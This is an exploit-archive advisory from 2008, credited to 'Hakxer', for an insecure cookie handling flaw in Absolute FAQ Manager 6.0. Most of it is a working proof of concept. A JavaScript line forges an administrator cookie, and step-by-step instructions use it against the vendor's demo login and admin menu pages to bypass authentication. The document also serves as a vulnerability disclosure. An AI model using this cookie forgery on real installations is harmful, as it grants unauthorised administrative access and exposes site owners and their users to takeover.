[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Absolute FAQ Manager 6.0 Insecure Cookie Handling Vulnerability
# Published : 2008-10-31
# Author : Hakxer
# Previous Title : Absolute News Feed 1.0 Remote Insecure Cookie Handling Vulnerability
# Next Title : SFS EZ Hotscripts-like Site (cid) Remote SQL Injection Vulnerability


#####################################################################################
# Discovered by : Hakxer                                                            #
# Script : Absolute FAQ Manager http://www.xigla.com/absolutefmnet/demo.htm         #
# Greetz : Allah , All My friend ,www.educ-up.com                                   #
# -------------------------------                                                   #
# Poc :                                                                             #
# javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s=";                   #
#                                                                                   #
# [~] Exploit                                                                       #
#                                                                                   #
# Go To admin login : http://www.xigla.com/absolutefmnet/demo/login.aspx            #
# Execute JS Code : javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
# Now Go to :http://www.xigla.com/absolutefmnet/demo/menu.aspx                      #
# 								                    #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )                    #
#####################################################################################

# www.Syue.com [2008-10-31]